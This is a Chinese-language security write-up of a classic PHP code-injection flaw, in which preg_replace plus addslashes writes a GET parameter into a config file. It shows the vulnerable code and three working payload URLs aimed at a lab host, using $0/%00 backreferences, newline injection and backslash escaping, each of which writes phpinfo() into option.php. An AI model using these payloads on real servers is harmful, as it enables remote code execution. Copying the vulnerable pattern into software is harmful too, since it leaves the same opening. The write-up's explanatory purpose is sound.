PHP正则经典漏洞

西大

　　@author: Dlive
　　P牛在小密圈中发的一个有关使用PHP正则配合写配置文件导致Getshell的经典漏洞
　　漏洞代码是这样的：
<?php　　
//ph.php
　　
$str = addslashes($_GET['option']);
　　
$file = file_get_contents('option.php');
　　
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
　　
var_dump($file);
　　
file_put_contents('option.php', $file);
<?php　　
//option.php
　　
$option='123';

0x01 利用%00或$0
　　这是我当时利用的一个方法(感觉我这个方法绕了好大一个弯儿QAQ)
　　payload:
　　

http://192.168.204.238/test/ph.php?option=;phpinfo();　　
http://192.168.204.238/test/ph.php?option=%00
　　

　　第二次传入的%00换为$0可达到相同效果
　　参考php手册对\0或$0的描述：
　　

http://php.net/manual/zh/function.preg-replace.php　　
\\0和$0代表完整的模式匹配文本
　　

　　%00被addslashes()转为\0，而\0在preg_replace函数的第二个参数中代表“匹配到的全部内容”（$0同理）
　　此时preg_replace要执行的代码如下
preg_replace('|\$option=\'.*\';|',"\$option='\\0';",$file);　　或
preg_replace('|\$option=\'.*\';|',"\$option='$0';",$file);　　即执行
preg_replace('|\$option=\'.*\';|',"\$option='$option=';phpinfo();';';",$file);　　成功闭合单引号写入如下shell
<?php　　
$option='$option=';phpinfo();';';

0x02 利用换行符%0a和正则匹配缺陷
　　第一次传入 aaa';phpinfo();%0a//
　　此时文件内容
$option='aaa\';phpinfo();　　
//';
　　第二次传入随意字符串，如bbb， 正则代码.*会将匹配到的aaa\替换为bbb (正则匹配的缺陷)
　　此时文件内容(成功写入恶意代码)
$option='bbb';phpinfo();　　
//';

0x03 利用反斜杠转义单引号
　　payload:
　　

http://192.168.204.238/test/ph.php?option=\';phpinfo();//　　

　　虽然addslashes将\转义为\\但是经过preg_replace处理后\\又变为了\
　　

view-source:http://192.168.204.247/test/ph.php?option=\　　

　　
string(19) "after addslashes:\\"
　　
string(42) "second param of preg_replace:$option='\\';"
　　
string(37) "after preg_replace:<?php
　　
$option='\';"
　　

　　最后的单引号被反斜杠转义